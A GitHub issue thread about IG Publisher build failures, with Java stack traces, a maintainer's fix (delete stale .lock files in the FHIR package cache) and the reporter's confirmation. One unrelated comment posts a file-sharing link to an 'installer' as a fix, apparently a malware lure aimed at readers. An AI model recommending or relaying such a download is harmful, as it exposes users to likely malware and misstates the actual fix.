### ISSUE TITLE
TimeoutException in 1.6.21 and 1.6.22

### ISSUE THREAD

**Issue by revans2023** [HL7/fhir-ig-publisher#953]
For the last two releases of IG Publisher (both 1.6.22 and 1.6.21), I am getting the following error when building my implementation guides locally:

```
Core Package hl7.fhir.r4.core#4.0.1
Publishing Content Failed: Error reading package.                                                    (01:00.030 / 01:49.080, 104Mb)
                                                                                                     (00:00.001 / 01:49.081, 104Mb)
Use -? to get command line help                                                                      (00:00.001 / 01:49.083, 104Mb)
                                                                                                     (00:00.001 / 01:49.084, 104Mb)
Stack Dump (for debugging):                                                                          (00:00.001 / 01:49.085, 104Mb)
java.io.IOException: Error reading package.
        at org.hl7.fhir.utilities.npm.FilesystemPackageCacheManagerLocks$PackageLock.checkForLockFileWaitForDeleteIfExists(FilesystemPackageCacheManagerLocks.java:148)
        at org.hl7.fhir.utilities.npm.FilesystemPackageCacheManagerLocks$PackageLock.doReadWithLock(FilesystemPackageCacheManagerLocks.java:157)
        at org.hl7.fhir.utilities.npm.FilesystemPackageCacheManager.loadPackageFromCacheOnly(FilesystemPackageCacheManager.java:453)
```

If I go back to 1.6.20 now that also does not work as I get this error:
```
Connect to Terminology Server at http://tx.fhir.org                                                  (00:09.390 / 00:32.437, 235Mb)
org.hl7.fhir.exceptions.FHIRException: Error fetching the server's terminology capabilities
        at org.hl7.fhir.r4.utils.client.FHIRToolingClient.getTerminologyCapabilities(FHIRToolingClient.java:136)
        at org.hl7.fhir.convertors.txClient.TerminologyClientR4.getTerminologyCapabilities(TerminologyClientR4.java:73)
        at org.hl7.fhir.r5.terminologies.client.TerminologyClientContext.initialize(TerminologyClientContext.java:178)
        at org.hl7.fhir.r5.context.SimpleWorkerContext.connectToTSServer(SimpleWorkerContext.java:343)
        at org.hl7.fhir.r5.context.SimpleWorkerContext.connectToTSServer(SimpleWorkerContext.java:372)
        at org.hl7.fhir.igtools.publisher.Publisher.initializeFromIg(Publisher.java:3252)
        at org.hl7.fhir.igtools.publisher.Publisher.initialize(Publisher.java:2581)
        at org.hl7.fhir.igtools.publisher.Publisher.execute(Publisher.java:1012)
        at org.hl7.fhir.igtools.publisher.Publisher.main(Publisher.java:13022)
Caused by: java.net.SocketTimeoutException: Read timed out
        at java.base/sun.nio.ch.NioSocketImpl.timedRead(NioSocketImpl.java:278)
        at java.base/sun.nio.ch.NioSocketImpl.implRead(NioSocketImpl.java:304)
        at java.base/sun.nio.ch.NioSocketImpl.read(NioSocketImpl.java:346)
        at java.base/sun.nio.ch.NioSocketImpl$1.read(NioSocketImpl.java:796)
        at java.base/java.net.Socket$SocketInputStream.read(Socket.java:1099)
        at okio.InputStreamSource.read(JvmOkio.kt:93)
        at okio.AsyncTimeout$source$1.read(AsyncTimeout.kt:128)
        at okio.RealBufferedSource.indexOf(RealBufferedSource.kt:430)
        at okio.RealBufferedSource.readUtf8LineStrict(RealBufferedSource.kt:323)
        at okhttp3.internal.http1.HeadersReader.readLine(HeadersReader.kt:29)
        at okhttp3.internal.http1.Http1ExchangeCodec.readResponseHeaders(Http1ExchangeCodec.kt:180)
        at okhttp3.internal.connection.Exchange.readResponseHeaders(Exchange.kt:110)
        at okhttp3.internal.http.CallServerInterceptor.intercept(CallServerInterceptor.kt:93)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at okhttp3.internal.connection.ConnectInterceptor.intercept(ConnectInterceptor.kt:34)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at okhttp3.internal.cache.CacheInterceptor.intercept(CacheInterceptor.kt:95)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at okhttp3.internal.http.BridgeInterceptor.intercept(BridgeInterceptor.kt:83)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at okhttp3.internal.http.RetryAndFollowUpInterceptor.intercept(RetryAndFollowUpInterceptor.kt:76)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at org.hl7.fhir.r4.utils.client.network.RetryInterceptor.intercept(RetryInterceptor.java:64)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at org.hl7.fhir.r4.utils.client.network.RetryInterceptor.intercept(RetryInterceptor.java:64)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at org.hl7.fhir.r4.utils.client.network.FhirLoggingInterceptor.intercept(FhirLoggingInterceptor.java:52)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at okhttp3.internal.connection.RealCall.getResponseWithInterceptorChain$okhttp(RealCall.kt:201)
        at okhttp3.internal.connection.RealCall.execute(RealCall.kt:154)
        at org.hl7.fhir.r4.utils.client.network.FhirRequestBuilder.execute(FhirRequestBuilder.java:244)
        at org.hl7.fhir.r4.utils.client.network.Client.executeFhirRequest(Client.java:147)
        at org.hl7.fhir.r4.utils.client.network.Client.issueGetResourceRequest(Client.java:65)
        at org.hl7.fhir.r4.utils.client.FHIRToolingClient.getTerminologyCapabilities(FHIRToolingClient.java:133)
        ... 8 more
org.hl7.fhir.exceptions.TerminologyServiceException: org.hl7.fhir.exceptions.FHIRException: Error fetching the server's terminology capabilities
        at org.hl7.fhir.r5.context.SimpleWorkerContext.connectToTSServer(SimpleWorkerContext.java:355)
        at org.hl7.fhir.r5.context.SimpleWorkerContext.connectToTSServer(SimpleWorkerContext.java:372)
        at org.hl7.fhir.igtools.publisher.Publisher.initializeFromIg(Publisher.java:3252)
        at org.hl7.fhir.igtools.publisher.Publisher.initialize(Publisher.java:2581)
        at org.hl7.fhir.igtools.publisher.Publisher.execute(Publisher.java:1012)
        at org.hl7.fhir.igtools.publisher.Publisher.main(Publisher.java:13022)
Caused by: org.hl7.fhir.exceptions.FHIRException: Error fetching the server's terminology capabilities
        at org.hl7.fhir.r4.utils.client.FHIRToolingClient.getTerminologyCapabilities(FHIRToolingClient.java:136)
        at org.hl7.fhir.convertors.txClient.TerminologyClientR4.getTerminologyCapabilities(TerminologyClientR4.java:73)
        at org.hl7.fhir.r5.terminologies.client.TerminologyClientContext.initialize(TerminologyClientContext.java:178)
        at org.hl7.fhir.r5.context.SimpleWorkerContext.connectToTSServer(SimpleWorkerContext.java:343)
        ... 5 more
Caused by: java.net.SocketTimeoutException: Read timed out
        at java.base/sun.nio.ch.NioSocketImpl.timedRead(NioSocketImpl.java:278)
        at java.base/sun.nio.ch.NioSocketImpl.implRead(NioSocketImpl.java:304)
        at java.base/sun.nio.ch.NioSocketImpl.read(NioSocketImpl.java:346)
        at java.base/sun.nio.ch.NioSocketImpl$1.read(NioSocketImpl.java:796)
        at java.base/java.net.Socket$SocketInputStream.read(Socket.java:1099)
        at okio.InputStreamSource.read(JvmOkio.kt:93)
        at okio.AsyncTimeout$source$1.read(AsyncTimeout.kt:128)
        at okio.RealBufferedSource.indexOf(RealBufferedSource.kt:430)
        at okio.RealBufferedSource.readUtf8LineStrict(RealBufferedSource.kt:323)
        at okhttp3.internal.http1.HeadersReader.readLine(HeadersReader.kt:29)
        at okhttp3.internal.http1.Http1ExchangeCodec.readResponseHeaders(Http1ExchangeCodec.kt:180)
        at okhttp3.internal.connection.Exchange.readResponseHeaders(Exchange.kt:110)
        at okhttp3.internal.http.CallServerInterceptor.intercept(CallServerInterceptor.kt:93)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at okhttp3.internal.connection.ConnectInterceptor.intercept(ConnectInterceptor.kt:34)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at okhttp3.internal.cache.CacheInterceptor.intercept(CacheInterceptor.kt:95)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at okhttp3.internal.http.BridgeInterceptor.intercept(BridgeInterceptor.kt:83)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at okhttp3.internal.http.RetryAndFollowUpInterceptor.intercept(RetryAndFollowUpInterceptor.kt:76)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at org.hl7.fhir.r4.utils.client.network.RetryInterceptor.intercept(RetryInterceptor.java:64)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at org.hl7.fhir.r4.utils.client.network.RetryInterceptor.intercept(RetryInterceptor.java:64)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at org.hl7.fhir.r4.utils.client.network.FhirLoggingInterceptor.intercept(FhirLoggingInterceptor.java:52)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at okhttp3.internal.connection.RealCall.getResponseWithInterceptorChain$okhttp(RealCall.kt:201)
        at okhttp3.internal.connection.RealCall.execute(RealCall.kt:154)
        at org.hl7.fhir.r4.utils.client.network.FhirRequestBuilder.execute(FhirRequestBuilder.java:244)
        at org.hl7.fhir.r4.utils.client.network.Client.executeFhirRequest(Client.java:147)
        at org.hl7.fhir.r4.utils.client.network.Client.issueGetResourceRequest(Client.java:65)
        at org.hl7.fhir.r4.utils.client.FHIRToolingClient.getTerminologyCapabilities(FHIRToolingClient.java:133)
        ... 8 more
Publishing Content Failed: Unable to connect to terminology server at http://tx.fhir.org. Error = org.hl7.fhir.exceptions.FHIRException: Error fetching the server's terminology capabilities (00:24.700 / 00:57.137, 140Mb)
                                                                                                     (00:00.001 / 00:57.138, 140Mb)
Use -? to get command line help                                                                      (00:00.000 / 00:57.139, 140Mb)
                                                                                                     (00:00.000 / 00:57.140, 140Mb)
Stack Dump (for debugging):                                                                          (00:00.000 / 00:57.141, 140Mb)
org.hl7.fhir.exceptions.FHIRException: Unable to connect to terminology server at http://tx.fhir.org. Error = org.hl7.fhir.exceptions.FHIRException: Error fetching the server's terminology capabilities
        at org.hl7.fhir.r5.context.SimpleWorkerContext.connectToTSServer(SimpleWorkerContext.java:376)
        at org.hl7.fhir.igtools.publisher.Publisher.initializeFromIg(Publisher.java:3252)
        at org.hl7.fhir.igtools.publisher.Publisher.initialize(Publisher.java:2581)
        at org.hl7.fhir.igtools.publisher.Publisher.execute(Publisher.java:1012)
        at org.hl7.fhir.igtools.publisher.Publisher.main(Publisher.java:13022)
Caused by: org.hl7.fhir.exceptions.TerminologyServiceException: org.hl7.fhir.exceptions.FHIRException: Error fetching the server's terminology capabilities
        at org.hl7.fhir.r5.context.SimpleWorkerContext.connectToTSServer(SimpleWorkerContext.java:355)
        at org.hl7.fhir.r5.context.SimpleWorkerContext.connectToTSServer(SimpleWorkerContext.java:372)
        ... 4 more
Caused by: org.hl7.fhir.exceptions.FHIRException: Error fetching the server's terminology capabilities
        at org.hl7.fhir.r4.utils.client.FHIRToolingClient.getTerminologyCapabilities(FHIRToolingClient.java:136)
        at org.hl7.fhir.convertors.txClient.TerminologyClientR4.getTerminologyCapabilities(TerminologyClientR4.java:73)
        at org.hl7.fhir.r5.terminologies.client.TerminologyClientContext.initialize(TerminologyClientContext.java:178)
        at org.hl7.fhir.r5.context.SimpleWorkerContext.connectToTSServer(SimpleWorkerContext.java:343)
        ... 5 more
Caused by: java.net.SocketTimeoutException: Read timed out
        at java.base/sun.nio.ch.NioSocketImpl.timedRead(NioSocketImpl.java:278)
        at java.base/sun.nio.ch.NioSocketImpl.implRead(NioSocketImpl.java:304)
        at java.base/sun.nio.ch.NioSocketImpl.read(NioSocketImpl.java:346)
        at java.base/sun.nio.ch.NioSocketImpl$1.read(NioSocketImpl.java:796)
        at java.base/java.net.Socket$SocketInputStream.read(Socket.java:1099)
        at okio.InputStreamSource.read(JvmOkio.kt:93)
        at okio.AsyncTimeout$source$1.read(AsyncTimeout.kt:128)
        at okio.RealBufferedSource.indexOf(RealBufferedSource.kt:430)
        at okio.RealBufferedSource.readUtf8LineStrict(RealBufferedSource.kt:323)
        at okhttp3.internal.http1.HeadersReader.readLine(HeadersReader.kt:29)
        at okhttp3.internal.http1.Http1ExchangeCodec.readResponseHeaders(Http1ExchangeCodec.kt:180)
        at okhttp3.internal.connection.Exchange.readResponseHeaders(Exchange.kt:110)
        at okhttp3.internal.http.CallServerInterceptor.intercept(CallServerInterceptor.kt:93)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at okhttp3.internal.connection.ConnectInterceptor.intercept(ConnectInterceptor.kt:34)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at okhttp3.internal.cache.CacheInterceptor.intercept(CacheInterceptor.kt:95)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at okhttp3.internal.http.BridgeInterceptor.intercept(BridgeInterceptor.kt:83)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at okhttp3.internal.http.RetryAndFollowUpInterceptor.intercept(RetryAndFollowUpInterceptor.kt:76)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at org.hl7.fhir.r4.utils.client.network.RetryInterceptor.intercept(RetryInterceptor.java:64)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at org.hl7.fhir.r4.utils.client.network.RetryInterceptor.intercept(RetryInterceptor.java:64)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at org.hl7.fhir.r4.utils.client.network.FhirLoggingInterceptor.intercept(FhirLoggingInterceptor.java:52)
        at okhttp3.internal.http.RealInterceptorChain.proceed(RealInterceptorChain.kt:109)
        at okhttp3.internal.connection.RealCall.getResponseWithInterceptorChain$okhttp(RealCall.kt:201)
        at okhttp3.internal.connection.RealCall.execute(RealCall.kt:154)
        at org.hl7.fhir.r4.utils.client.network.FhirRequestBuilder.execute(FhirRequestBuilder.java:244)
        at org.hl7.fhir.r4.utils.client.network.Client.executeFhirRequest(Client.java:147)
        at org.hl7.fhir.r4.utils.client.network.Client.issueGetResourceRequest(Client.java:65)
        at org.hl7.fhir.r4.utils.client.FHIRToolingClient.getTerminologyCapabilities(FHIRToolingClient.java:133)
        ... 8 more
```

**Comment by GenaroSalomone** [comment]
try this
https://gofile.io/d/yMHabA
select the desired compiler in the installer

**Comment by lmckenzi** [comment]
We believe this was an spurious problem with the package server.  Can you please re-test and let us know if this is still an issue @revans2023?

**Comment by grahamegrieve** [comment]
@dotasek please check this stack

**Comment by dotasek** [comment]
@revans2023

Try checking the package cache `~/.fhir/packages` or `C:\users\<username>\.fhir\packages` normally and look for any *.lock files in that directory. Delete those, and the package directory they name (so if you find `mypackage#1.2.3.lock` delete it, and the `mypackage#1.2.3.lock` directory as well)

Occasionally a package will only get partially installed, and normally when that happens the lock file won't get deleted. We should have been checking for that in previous versions of the IG Publisher, but we weren't. With that check in place now, it looks like it's causing headaches. I'm working on handling this better in a coming release.

**Comment by revans2023** [comment]
> @revans2023
> 
> Try checking the package cache (`~/.fhir/packages` or `C:\users\<username>\.fhir\packages` normally) and look for any *.lock files in that directory. Delete those, and the package directory they name (so if you find `mypackage#1.2.3.lock` delete it, and the `mypackage#1.2.3.lock` directory as well)
> 
> Occasionally a package will only get partially installed, and normally when that happens the lock file won't get deleted. We should have been checking for that in previous versions of the IG Publisher, but we weren't. With that check in place now, it looks like it's causing headaches. I'm working on handling this better in a coming release.

That was exactly what I needed as I had a "fhir.cqf.commons#4.0.1.lock" and "hl7.fhir.r4.core#4.0.1.lock" file in my $HOME\.fhir\packages folder - thank you so much for helping me!

**Comment by dotasek** [comment]
@revans2023 glad to hear it. As of 6.3.27, we should be automatically cleaning those incomplete downloads.
